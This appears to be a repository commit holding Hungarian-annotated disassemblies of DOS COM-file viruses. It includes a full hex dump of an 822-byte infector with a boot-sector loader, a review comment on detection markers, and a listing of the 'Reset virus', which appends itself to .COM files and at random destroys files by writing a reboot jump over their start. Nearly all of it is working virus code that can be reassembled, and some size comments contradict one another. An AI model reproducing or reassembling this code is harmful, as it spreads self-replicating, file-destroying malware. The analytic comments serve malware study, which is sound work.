0261 B80242 MOV AX,4202 ;File Pointer file vgre  llˇt sa
0264 B90000 MOV CX,0000
0267 BA0000 MOV DX,0000
026A CD21 INT 21
026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!}
;A file elejre irand˘ JMP operandus nak kisz mˇt sa:
026E 8BC8 MOV CX,AX ;AX-ben a file hossza
0270 2D0300 SUB AX,0003 ;AX-ben az eltol s a JMP utasˇt s-
;hoz, ahhoz amit a file elejre fog
;majd ˇrni . Igy ez a JMP a file
;mostani vge ut ni bytera fog mu-
;tatni.
0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307)
;Az Łj fileon bel<65>li adatter<65>let cˇmnek kisz mˇt sa s be l-
;lˇt sa:
0277 81C1F902 ADD CX,02F9 ;CX az Łj fileon bel<65>li adatter<65>-
027B 8BFE MOV DI,SI ;letre mutat.
027D 81EFF701 SUB DI,01F7 ;A vˇrus els” utasˇt s nak (MOV DX,
;02F9) operandus nak cˇme.
0281 890D MOV [DI],CX ;Ide ˇrja az adatter<65>let cˇmt
;-----------------------------------------
; A vˇrus hozz m solja mag t a filehoz:
;-----------------------------------------
;(A filemutat˘ a file vgre mutat.)
0283 B440 MOV AH,40 ;Ir s fileba.
0285 B93603 MOV CX,0336 ;822 byte (a vˇrus hossza)
0288 8BD6 MOV DX,SI
028A 81EAF901 SUB DX,01F9 ;DX a vˇrus els” bytej ra mutat
028E CD21 INT 21
0290 721F JB 02B1 ;Hib n l vge
0292 3D3603 CMP AX,0336
0295 751A JNZ 02B1 ;Ha nem ˇrta ki mind a 648 byteot
;Az els” 3 byte  t llˇt sa, egy a file vgre mutat˘ ugr˘ uta-
;sˇt sra:
0297 B80042 MOV AX,4200 ;A file pointer a file elejre!
029A B90000 MOV CX,0000
029D BA0000 MOV DX,0000
02A0 CD21 INT 21
02A2 720D JB 02B1 ;{Itt sem lehet hiba!}
02A4 B440 MOV AH,40 ;Ir s fileba
02A6 B90300 MOV CX,0003 ;3 byte
02A9 8BD6 MOV DX,SI
02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr˘ utasˇt sra
02AF CD21 INT 21 ;mutat
;Az eredeti id” ( m r a fert”zsjelzssel egy<67>tt ) vissza llˇ-
;t sa:
02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF)
02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)
02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!}
02BD 81C91F00 OR CX,001F ;M r volt fert”zve jelzs
02C1 B80157 MOV AX,5701 ;Set Date & Time
02C4 CD21 INT 21
;A file lez r sa:
02C6 B43E MOV AH,3E ;Close Handle
02C8 CD21 INT 21
;Az eredeti attributtum vissza llˇt sa:
02CA B80143 MOV AX,4301 ;Set File Attributtum
02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301)
02D1 BA1F00 MOV DX,001F
02D4 90 NOP
02D5 03D6 ADD DX,SI ;FILE_PATH (0318)
02D7 CD21 INT 21
;DTA vissza llˇt sa az eredeti cˇmre:
02D9 1E PUSH DS
02DA B41A MOV AH,1A ;Set DTA
02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9)
02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB)
02E4 CD21 INT 21
02E6 1F POP DS
;-----------------------------------------
; Az eredeti program futtat sa:
;-----------------------------------------
02E7 59 POP CX ;CX vissza llˇt sa
02E8 33C0 XOR AX,AX ;Regiszterek null z sa
02EA 33DB XOR BX,BX
02EC 33D2 XOR DX,DX
02EE 33F6 XOR SI,SI
02F0 BF0001 MOV DI,0100
02F3 57 PUSH DI ;0100 a stackre
02F4 33FF XOR DI,DI
02F6 C2FFFF RET FFFF ;100-on folytat˘dik a vezrls
;SP-- {Hogy minek?}
;-----------------------------------------
; ADAT TERšLET
;-----------------------------------------
;Ide mutat (02F9-re) a vˇrus elejn DX, ks”bb SI,BX.
02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cˇme
02FB ERE_DTA_SEG DW (?) ;[SI+02]
02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje,
02FF ERE_DATE DW (?) ;[SI+06] d tuma,
0301 ERE_ATTR DW (?) ;[SI+08] attributtuma
0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A]
;A file eredeti els” 3 byteja.
;A k”vetkez” 3 byteon lesz az a 3 byte , amit a vˇrus egy meg-
;fert”zend” file elejre fog ˇrni.
0306 B_JMP DB E9 ;[SI+0D]
;JMP gpik˘dja
0307 CIM_JMP DW (?) ;Eltol s (JMP operandusa)
0309 KERES_STR DB '*.COM',0 ;[SI+10]
;Ezt a stringet m solja a
;FILE_NEV_MUT cˇmre
030F PATH_MUT DW (?) ;[SI+16]
;Hol a k”vetkez” aldirectory neve
;az environmenten.
0311 FILE_NEV_MUT DW (?) ;[SI+18]
;Az  tm solt aldirectory m”g mu-
;tat.
;Azt mutatja , hogy hova kell a
;keressi stringet(*.COM), majd a
;file nevt m solni a FILE_PATH-
;on bel<65>l ahhoz, hogy teljes utat
;kapjunk.
0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
;environment ter<65>leten.
0318 FILE_PATH DB 40 DUP (?);[SI+1F]
;Itt lesz majd a keressi string
;s a fert”zend” file neve Łttal
;egy<67>tt.
;Ide mutat a DTA. Ezt a ter<65>letet fogja a DOS a file adataival
;felt”lteni.
0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
036D ENT_ATTR DB (?) ;Attributtum [SI+74]
036E ENT_IDO DW (?) ;Keletkezs ideje [SI+75]
0370 ENT_DATUM DW (?) ;Keletkezs d tuma [SI+77]
0372 ENT_HOSSZ DW (?) ;Als˘ sz˘ [SI+79]
0374 DW (?) ;Fels” sz˘ [SI+7B]
0376 ENT_NEV DB 0D DUP (?);Megtal lt file neve [SI+7D]
0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
;Nem haszn lja
;----------------------------------------------------
; A T”lt”get”t behŁz˘ rsz
;----------------------------------------------------
0388 50 PUSH AX ;Regiszterek elmentse
0389 53 PUSH BX
038A 51 PUSH CX
038B 52 PUSH DX
038C 06 PUSH ES
038D 1E PUSH DS
038E 57 PUSH DI
038F 56 PUSH SI
0390 E80000 CALL 0393 ;Lebuk s !! (/g)
0393 5B POP BX ;BX=0393
;A: BOOT beolvas sa/T”lt”get” lekrdezse
0394 BEA55A MOV SI,5AA5 ;T”lt”get” lekrdezse
0397 BFAA55 MOV DI,55AA
039A 0E PUSH CS
039B 07 POP ES
039C 81C3E803 ADD BX,03E8 ;BX=077B
03A0 81FBE803 CMP BX,03E8
03A4 7303 JNB 03A9
03A6 E98200 JMP 042B ;Ha nincs elg szabad mem˘ria a szegmensen
03A9 53 PUSH BX
03AA B80102 MOV AX,0201 ;A:BOOT beolvas sa
03AD BA0000 MOV DX,0000
03B0 B90100 MOV CX,0001
03B3 CD13 INT 13
03B5 5B POP BX
03B6 7308 JNB 03C0
03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
03BB 74EC JZ 03A9
03BD EB6C JMP 042B ;Val˘di hiba->vge
03BF 90 NOP
03C0 81FE5AA5 CMP SI,A55A
03C4 7465 JZ 042B ;Vge, ha a T”lt”get” m r a mem˘ri ban van
;Van-e elg szabad mem˘ria a T”lt”get” beolvas s hoz
03C6 8CC8 MOV AX,CS
03C8 050010 ADD AX,1000
03CB 53 PUSH BX
03CC 50 PUSH AX
03CD CD12 INT 12 ;Max mem.
03CF BB4000 MOV BX,0040
03D2 F7E3 MUL BX ;AX-ben a mem˘ria tetejnek szegmense
03D4 2D0010 SUB AX,1000 ;legal bb 4Kb kell a T”lt”get”nek
03D7 8BD8 MOV BX,AX
03D9 58 POP AX ;CS+1000
03DA 3BD8 CMP BX,AX
03DC 7304 JNB 03E2
03DE 5B POP BX
03DF EB4A JMP 042B ;Vge, ha nincs elg szabad mem˘ria
03E1 90 NOP
; A lemez ut˘ls˘ s vj nak megkeresse
03E2 5B POP BX ;BX=077B
03E3 8EC0 MOV ES,AX ;Max mem-1000
03E5 2E CS:
03E6 8B4718 MOV AX,[BX+18] ;S v hossza
03E9 2E CS:
03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak sz ma
03ED F7E1 MUL CX
03EF 8BC8 MOV CX,AX ;Egy cilinder nagys ga
03F1 2E CS:
03F2 8B4713 MOV AX,[BX+13] ;Szektorok sz ma
03F5 BA0000 MOV DX,0000
03F8 F7F1 DIV CX ;Osztva a cilinder nagys g val AL-ben a s v
; Az ut˘ls˘ s v beolvas sa
03FA 81EBE803 SUB BX,03E8 ;BX=0393
03FE 53 PUSH BX
03FF 8AE8 MOV CH,AL ;40/80-dik s v
0401 B101 MOV CL,01
0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
0406 BA0000 MOV DX,0000
0409 B80802 MOV AX,0208 ;8 szektor beolvas sa
040C CD13 INT 13
040E 5B POP BX
040F 721A JB 042B ;Hib n l vge
; Ha a T”lt”get”t tal l, elindˇtja
0411 53 PUSH BX
0412 BB0001 MOV BX,0100
0415 26 ES:
0416 8B07 MOV AX,[BX]
0418 3D5224 CMP AX,2452 ;Azonosˇt˘
041B 5B POP BX
041C 750D JNZ 042B ;Ha nem T”lt”get”
041E 8BC3 MOV AX,BX
0420 059800 ADD AX,0098 ;AX=042B (A visszatrsre mutat)
0423 0E PUSH CS
0424 50 PUSH AX
0425 B80A01 MOV AX,010A ;T”lt”get” belpsi pontja
0428 06 PUSH ES
0429 50 PUSH AX
042A CB RETF
; Visszatrs
042B 5E POP SI ;Regiszterek vissza
042C 5F POP DI
042D 1F POP DS
042E 07 POP ES
042F 5A POP DX
0430 59 POP CX
0431 5B POP BX
0432 58 POP AX
0433 C3 RET
0434 0000 DW 0000 ;???
A vˇrus hexa dumpja :
0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
0430 59 5B 58 C3 00 00 Y[X...
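Review bot: The commentary in this listing contradicts its own constants in three places, which matters for a file that exists to be read rather than assembled: the comment on `0295 751A JNZ 02B1` speaks of 648 bytes although the preceding `0285 B93603 MOV CX,0336` and the header both give 822 bytes; the comment on `01E1 77E6 JA 01C9` writes the limit as "64000h" while FA00h is 64000 decimal; and `02B5 8B8C0400 MOV CX,[SI+0004]` is annotated ERE_TIME (027D) although the data-area table at 02FD places ERE_TIME there. I would correct them to `;not all 822 (0336h) bytes were written`, `;file longer than FA00h = 64000 bytes` and `;ERE_TIME (02FD)`. For readers using this listing to write detection, the check at 01D1–01D9 together with `02BD 81C91F00 OR CX,001F` documents that the infection marker is a file timestamp whose seconds field is 1Fh (62 seconds, outside the valid DOS range), and the annotator's own "Lebuk s" remark on `0390 E80000 CALL 0393` / `0393 5B POP BX` marks the call/pop address-discovery idiom as the loader part's most recognisable pattern; both deserve a sentence in the header next to the 822-byte length. The hex dump closing this file (0100–0430) appears byte-identical to the dump that ends the preceding file in this commit (visible from 0260 on), so one of the two files may be a duplicate upload.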


@ -0,0 +1,571 @@
Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
(41) 21-033
Unassemble list:
114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
114E:0103 49 DEC CX
114E:0104 60 DB 60
114E:0105 61 DB 61
114E:0106 6D DB 6D
114E:0107 206120 AND [BX+DI+20],AH
114E:010A 52 PUSH DX
114E:010B 65 DB 65
114E:010C 7365 JNB 0173
114E:010E 7420 JZ 0130
114E:0110 56 PUSH SI
114E:0111 49 DEC CX
114E:0112 52 PUSH DX
114E:0113 55 PUSH BP
114E:0114 53 PUSH BX
114E:0115 2124 AND [SI],SP
114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott
;program kezdete
114E:011A B409 MOV AH,09
114E:011C CD21 INT 21 ;uzenet kepernyore
114E:011E B400 MOV AH,00
114E:0120 CD20 INT 20 ;exit to DOS
114E:0122 51 PUSH CX ;stack-en marad
;a kovetkezo utasitas operandusat fertozeskor
;allitja be, igy mindig a helyes cimre mutat
114E:0123 BA1B03 MOV DX,031B
114E:0126 FC CLD ;elore
114E:0127 8BF2 MOV SI,DX
114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte
114E:012D BF0001 MOV DI,0100 ;program eleje
114E:0130 B90300 MOV CX,0003 ;3 byte
114E:0133 F3 REPZ
114E:0134 A4 MOVSB ;eredeti JMP 117
;visszamasolasa
114E:0135 8BF2 MOV SI,DX
114E:0137 B430 MOV AH,30
114E:0139 CD21 INT 21 ;DOS verzio szam lekerd.
114E:013B 3C00 CMP AL,00
114E:013D 7503 JNZ 0142
114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor
;nem fertoz a virus s
;futtatja az eredeti
;programot
114E:0142 06 PUSH ES
114E:0143 B42F MOV AH,2F
114E:0145 CD21 INT 21 ;DTA. lekerdezese
114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset
114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese
114E:014F 07 POP ES
;DTA. beallitasa az ENTRY cimere /dir.-bol/
;ide masolja a find first a file adatait
114E:0150 BA5F00 MOV DX,005F ;DX=037a
114E:0153 90 NOP
114E:0154 03D6 ADD DX,SI
114E:0156 B41A MOV AH,1A
114E:0158 CD21 INT 21 ;DTA. letrehozasa
;037a-tol uj cimre
114E:015A 06 PUSH ES
114E:015B 56 PUSH SI
114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense
114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a
;kovetkezo dir.-ra mu-
;tatni
114E:0163 5E POP SI
114E:0164 56 PUSH SI
114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo
;stringet keresi a
;kornyezetbe PATH
114E:0169 AC LODSB ;AL=DS:[SI],SI++
114E:016A B90080 MOV CX,8000 ;32 kbyte
114E:016D F2 REPNZ
114E:016E AE SCASB ;megkeresi a kovetke-
;zo P betut
114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi
114E:0172 AC LODSB
114E:0173 AE SCASB ;betunkent hasonlitja
114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI.
;karakter /kov.betu/
114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es
;osszehasonlitja a tobbi
;betut is
114E:0178 5E POP SI
114E:0179 07 POP ES ;ES:DI mutat az elso
;PATH-ra
114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file
;spec. cimenek mentese
;PATH mutato
114E:017E 8BFE MOV DI,SI ;SI=031b
114E:0180 81C71F00 ADD DI,001F ;DI=033a
114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu-
;tat az adatokra
114E:0186 81C61F00 ADD SI,001F ;SI=033a
114E:018A 8BFE MOV DI,SI ;DI=033a
114E:018C EB3A JMP 01C8
;A kovetkezo PATH-ban megadott aldirectoryt
;File Path-ra masolja, igy a kovetkezo file-t
;ebben az aldirectoryban keresi
114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ;
114E:0193 7503 JNZ 0198
114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva
114E:0198 1E PUSH DS
114E:0199 56 PUSH SI
114E:019A 26 ES:
114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense
114E:019F 8BFE MOV DI,SI ;DI=033a
114E:01A1 26 ES:
114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path
;masolasa ha az aktualis
;konyvtarban nem talalt
;fertozheto file-t
;a PATH= utanra mutat
;az SI
114E:01A6 81C71F00 ADD DI,001F
114E:01AA AC LODSB ;beolvas a kornyezetbol
;a 0029. byte-ot
114E:01AB 3C3B CMP AL,3B ;pontosvesszo ?
114E:01AD 740A JZ 01B9 ;igen
114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz
;tobb
114E:01B1 7403 JZ 01B6 ;igen
114E:01B3 AA STOSB ;letarol 033a-tol
114E:01B4 EBF4 JMP 01AA
114E:01B6 BE0000 MOV SI,0000
114E:01B9 5B POP BX ;BX=regi SI BX mutat
;az adatokra
114E:01BA 1F POP DS
114E:01BB 89B71600 MOV [BX+0016],SI
;a kovetkezo PATH-ban adott dir. mar atmasolva
114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ?
114E:01C3 7403 JZ 01C8 ;igen
114E:01C5 B05C MOV AL,5C ;egyebkent \ iras
;egy aldir. kiertekelese, eloszor az aktualis, majd
;a file path -ra masolt aldir. vegignezese, fertozes
;DI a file path-ba irt aldir. neve utani poz.-ra mu-
;tat
;COM file keresese
114E:01C7 AA STOSB ;\ jel beirasa
114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a
;file nevet masolni,
;az aldir. neve utan
114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d
114E:01CE 81C61000 ADD SI,0010 ;SI=032b
114E:01D2 B90600 MOV CX,0006
114E:01D5 F3 REPZ
114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa
;a PATH= szoveg utan
114E:01D7 8BF3 MOV SI,BX
114E:01D9 B44E MOV AH,4E ;a file adatai a DTA.
;alltal foglalt teru-
;letre
114E:01DB BA1F00 MOV DX,001F
114E:01DE 90 NOP
114E:01DF 03D6 ADD DX,SI
114E:01E1 B90300 MOV CX,0003
114E:01E4 CD21 INT 21 ;elso file bejegyzes ke-
;resese, az it. aktivi-
;zalasa utan felhozza a
;filemeretet, attrib.ot
;keletkezes datumat s
;idejet is!
114E:01E6 EB04 JMP 01EC ;vizsgalatra
114E:01E8 B44F MOV AH,4F
114E:01EA CD21 INT 21 ;kovetkezo file bejegy-
;zes keresese
114E:01EC 7302 JNB 01F0 ;ha nincs hiba
114E:01EE EB9E JMP 018E ;hiba eseten -ha nem
;talal tobb COM file-t
;mas aldirt keres
;mar talalt COM file-t, az adataival az entry fel
;van toltve, a file ellenorzese es fertozese
;kovetkezik
114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be
;SI=0390
114E:01F4 241F AND AL,1F ;maszk 31 -el
114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto-
;zott a file!
114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo
;file-t keresi
114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00
114E:0200 77E6 JA 01E8 ;ha > a file meret
;64000 byte-nal
114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A
114E:0207 72DF JB 01E8 ;ha < 10 byte nal
114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a
;megvan a kivalasztott file
;a file nevet a filespec utan kell masolni
114E:020D 56 PUSH SI ;DI mutat a filespec.re,
;PATH=*.COM
114E:020E 81C67D00 ADD SI,007D ;SI=0398
114E:0212 AC LODSB ;atmasolja a filenevet
;/megkeresett elso v.
;x.edik bejegyzest/
114E:0213 AA STOSB
114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle-
;zaro nullaig masol
114E:0216 75FA JNZ 0212 ;nem
114E:0218 5E POP SI ;SI ujra az adatokra mu-
;tat
;a file egyes eredeti informacioinak megorzese
;hogy a fertozese ne tunjon fel
;minek a file ATTR. megegyszer lekerdezni?
114E:0219 B80043 MOV AX,4300
114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec.
114E:021F 90 NOP
114E:0220 03D6 ADD DX,SI ;DX=031b
114E:0222 CD21 INT 21 ;attributum lekerdezese
;7.6.5.4.3.2.1.0.
;x x a d v s h r
114E:0224 898C0800 MOV [SI+0008],CX ;attributum
114E:0228 B80143 MOV AX,4301
114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC.
;ra valtoztatja
114E:022F BA1F00 MOV DX,001F
114E:0232 90 NOP
114E:0233 03D6 ADD DX,SI ;DX=033a
114E:0235 CD21 INT 21 ;attributum beallitasa
;file nyitasa
114E:0237 B8023D MOV AX,3D02
114E:023A BA1F00 MOV DX,001F
114E:023D 90 NOP
114E:023E 03D6 ADD DX,SI ;DS:DX = filespec.
114E:0240 CD21 INT 21 ;file nyitasa I/O ra
114E:0242 7303 JNB 0247
114E:0244 E9A500 JMP 02EC ;hiba eseten nincs
;fertozes
114E:0247 8BD8 MOV BX,AX ;handle
;a file idejenek lekerdezese de ez is megtalalhato az
;ENTRY teruleten
114E:0249 B80057 MOV AX,5700
114E:024C CD21 INT 21 ;file letrehozasi datum
;es ido bekerese
114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc
DH-sec DL-1/100
114E:0252 89940600 MOV [SI+0006],DX ;datum
114E:0256 B42C MOV AH,2C
114E:0258 CD21 INT 21 ;rendszerido bekerese
;annak eldontese hogy a filet tonkretegye-e
;ha a masodperc 7 akkor tonkreteszi /aktualis/
114E:025A 80E607 AND DH,07 ;sec = 7 ?
114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre!
;file tonkretetele
114E:025F B440 MOV AH,40
114E:0261 B90500 MOV CX,0005
114E:0264 8BD6 MOV DX,SI ;reset
114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0
114E:026A CD21 INT 21 ;file elejere ir 5 byte
;-ot a RESET re ugrast!
114E:026C EB65 JMP 02D3
114E:026E 90 NOP
;fertozes
;az eredeti 3 byte megorzese hogy kesobb meg futtatni
;lehessen
114E:026F B43F MOV AH,3F
114E:0271 B90300 MOV CX,0003
114E:0274 BA0A00 MOV DX,000A
114E:0277 90 NOP
114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA
114E:027A CD21 INT 21 ;a program eredeti elso
;3 byte-jat beolvassa
114E:027C 7255 JB 02D3 ;ha hiba van
114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ?
114E:0281 7550 JNZ 02D3 ;nem
;file vegere allas az uj cimek kiszamitasa
114E:0283 B80242 MOV AX,4202
114E:0286 B90000 MOV CX,0000
114E:0289 BA0000 MOV DX,0000
114E:028C CD21 INT 21 ;file vegere pozicional
114E:028E 7243 JB 02D3 ;ha hiba volt -nem
;nagyon lehet hiba!
;file elejere irando JMP operandus kiszamitasa
114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz
114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP
;utasitashoz amit a
;file elejere fog irni
;igy a JMP a file mos-
;tani vege utani bytera
;fog mutatni
114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim
;az uj file-on beluli adatterulet cimenek ki-
;szamitasa es beallitasa
114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli
;adatteruletre mutat
114E:029D 8BFE MOV DI,SI
114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa-
;nak operandusanak
;cime
114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet
;cimet
;file moge masolja magat
;filemutato a file vegere mutat
114E:02A5 B440 MOV AH,40
114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza
114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara
;mutat
114E:02AC 81EAF901 SUB DX,01F9
114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a
;program a fertozendo
;program moge irja
114E:02B2 721F JB 02D3 ;hiba eseten
114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ?
114E:02B7 751A JNZ 02D3 ;igen
;az elso 3 byte atallitasa, egy file
;vegere mutato ugro utasitasra
114E:02B9 B80042 MOV AX,4200
114E:02BC B90000 MOV CX,0000
114E:02BF BA0000 MOV DX,0000
114E:02C2 CD21 INT 21 ;file pointer a vegere
114E:02C4 720D JB 02D3 ;ha volt hiba -nem le-
;het hiba!
114E:02C6 B440 MOV AH,40
114E:02C8 B90300 MOV CX,0003
114E:02CB 8BD6 MOV DX,SI
114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra
;mutat
114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba
;az eredeti ido -mar a fertozesjelzessel egyutt-
;visszaallitasa
114E:02D3 8B940600 MOV DX,[SI+0006] ;datum
114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido
114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges!
114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy
;jelzi hogy mar ferto-
;zott egy file a SEC.
;-et 31-re allitja a
;file bejegyzesben
; hour | min. | sec.
;1111 1|111 111|0 0000
114E:02E3 B80157 MOV AX,5701
114E:02E6 CD21 INT 21 ;file keletk. ido beall.
;file zarasa
114E:02E8 B43E MOV AH,3E
114E:02EA CD21 INT 21 ;file zarasa
;eredeti attributum visszaallitasa
114E:02EC B80143 MOV AX,4301
114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./
